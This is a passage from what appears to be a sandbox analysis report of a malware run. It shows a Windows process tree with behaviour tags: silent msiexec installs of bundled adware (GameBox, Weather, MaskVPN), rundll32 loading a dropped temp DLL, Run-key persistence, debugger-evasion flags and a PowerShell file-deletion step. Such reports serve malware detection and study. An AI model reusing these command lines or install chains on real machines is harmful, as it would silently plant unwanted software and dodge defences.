                                                                                                                                                                                                                                                                        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:5636
                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                      PID:3936
                                                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                                                        PID:5340
                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                                                      PID:5128
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:5148
                                                                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                      PID:7672
                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 028F6052A2FE8BC8C915EF71D623C722 C
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:5868
                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding EC92D0FE9FD9F6C81FC82B7F1C1F2A45 C
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                        PID:6312
                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding E1B3CB1C65ADCF600ADC47B52EDD9692 C
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:6808
                                                                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B982EE1D12FC5573F3D061FDE4B3E4C6
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:4240
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                                                                        PID:5276
                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\RequiredApplication_1\Weather_Installation.exe" -silent=1 -AF=715 -BF=715 -uncf=default
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                          PID:9124
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" "--Ac4FtzsAeC"
                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                            PID:5268
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Weather\Weather.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Weather\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Weather\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Weather\User Data" --annotation=plat=Win64 --annotation=prod=Weather --annotation=ver=0.0.2 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffa8d3c9ec0,0x7ffa8d3c9ed0,0x7ffa8d3c9ee0
                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                PID:8372
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2132 /prefetch:8
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:9172
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1696 /prefetch:2
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:8928
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Weather\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --nwjs --extension-process --enable-auto-reload --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2616 /prefetch:1
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                      PID:8832
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2204 /prefetch:2
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:4224
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=2200 /prefetch:8
                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                          PID:2276
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3420 /prefetch:8
                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                            PID:8392
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3280 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                            PID:7520
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3344 /prefetch:8
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                              PID:8028
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,17890950345045354940,6062211166514064298,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5268_212362484" --mojo-platform-channel-handle=3412 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:8812
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D327.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                            PID:2320
                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                        PID:7756
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5580
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:8736
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:6948
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\CE4F.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\CE4F.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:8868
                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                          PID:6788
                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                          PID:8672
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:6724
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                            PID:6452
                                                                                                                                                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                          PID:8204
                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{75031801-02a9-6e4f-9ca6-98660627b607}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                            PID:9088
                                                                                                                                                                                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:5152
                                                                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:6592
                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:3472
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                PID:8948
                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:6024
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                  PID:4428
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                  • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                  PID:5152
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                    MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                    PID:5176
                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:6132
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:8384
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      PID:5132
                                                                                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                      PID:7200
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:5204
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                      PID:8612
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                      PID:2416
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:9132
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:5004
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:8004
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:7468
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          PID:7196
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                          PID:6404
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
